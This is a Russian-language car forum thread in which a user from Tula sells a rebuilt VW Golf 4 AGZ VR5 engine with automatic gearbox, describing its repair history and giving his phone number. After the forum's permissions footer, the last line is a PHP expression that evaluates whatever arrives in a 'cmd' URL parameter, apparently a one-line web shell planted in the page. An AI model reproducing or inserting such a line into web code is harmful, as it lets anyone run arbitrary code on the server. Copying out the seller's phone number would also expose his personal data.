+ Ответить в теме
Показано с 1 по 1 из 1

Тема: Двигатель AGZ VR5 первой комплектности


  1. #1
    Мимо проходил gochi is on a distinguished road Аватар для gochi
    Регистрация
    05.04.2018
    Откуда
    Тула
    Машина
    GOLF 4 VR5
    Сообщений
    1

    Двигатель AGZ VR5 первой комплектности

    Друзья,продаю движок AGZ VR5 c golf 4, после капитального ремонта прошел всего 8000 км. Делал для себя и денег не жалел. В движок вложенно около 135 000 р. Практически все новое,вручаюсь головой.

    История была такова : Брал машину (golf 4 1998г.) в декабре 2016 г.Кузов был на 3,а мотор с акпп более менее живые. После двух месяцев эксплуатации заметил, что мотор подбирает масло,примерно 1-1,5 л на 100 км. После замера компрессии и не долгих размышлений , решился на полный кап. ремонт двс. Мне немного не повезло,т.к. доллар "подскочил" в 3 раза к этому времени,а все железо на этот мотор с европы, плюсом еще из-за санкций срок доставки был от 2-х месяцев. Вообщем весь ремонт ( дификтовка,заказ з.ч., расточки,шлифовки и тд) занял 4 месяца (март-июнь).
    После ремонта катался на машине до декабря 2017, пока мне с зади не приехал камаз. Это была большая печаль.К этому времени,по мимо мотора,у меня была уже полностью новая подвеска,вся. Кузов восстанавливать не было смысла и желания. Была идея купить такой же гольф и перекинуть все туда.Но когда я занимался поиском ,мне подвернулся хороший вариант и я взял другую машину.
    Кузов гольфа частично продал,остальное в металл. Подвеску и салон продал.Остался мотор в сборе с АКПП,блок охлаждения(два радиатора с вентиляторами),блок АБС,коммутатор,блок управления вентиляторами ну и еще всякая мелочь.
    Когда в гаи оформлял утилизацию,хотел сделать "отчуждение" агрегата (двс),но оказалось, что в птс есть номер двигателя,а на движке его нет. Движок видимо был контрактный. Когда покупал, на это даже не смотрел,т.к. мотор вроде как является запчастью,да и проблем у меня не было при постановке на учет.
    Вообщем долго думал я и решил ,что нужно все таки его тоже продать. Посмотрел на всяких сайтах цены на (контрактные) бу моторы 30 000- 40 000 т.р. и не понятно в каком он состоянии и сколько пробег.
    Отдам свой AGZ VR5 первой комплектности c AКПП(3+) в сборе,с пробегом 8 000 т.км, за 35 000 т.р., для реально заинтересованных лиц могу немного поторговаться,но только на месте. По всему остальному цена договорная.
    Мой номер 89202777906 Сергей
    Последний раз редактировалось gochi; 07.04.2018 в 22:58.

+ Ответить в теме

Похожие темы

  1. Проблема при включении первой передачи (МКПП).
    от WoLAND в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 15
    Последнее сообщение: 16.05.2014, 10:00
  2. Двигатель ASZ (PD 130 Л.С.)
    от Masterkey79 в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 06.05.2014, 23:05
  3. Хруст на первой передаче.
    от Patrunya в разделе Разное
    Ответов: 4
    Последнее сообщение: 06.06.2010, 12:05
  4. Двигатель 1.8 Рн
    от dimik20003 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 0
    Последнее сообщение: 30.10.2008, 00:04

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}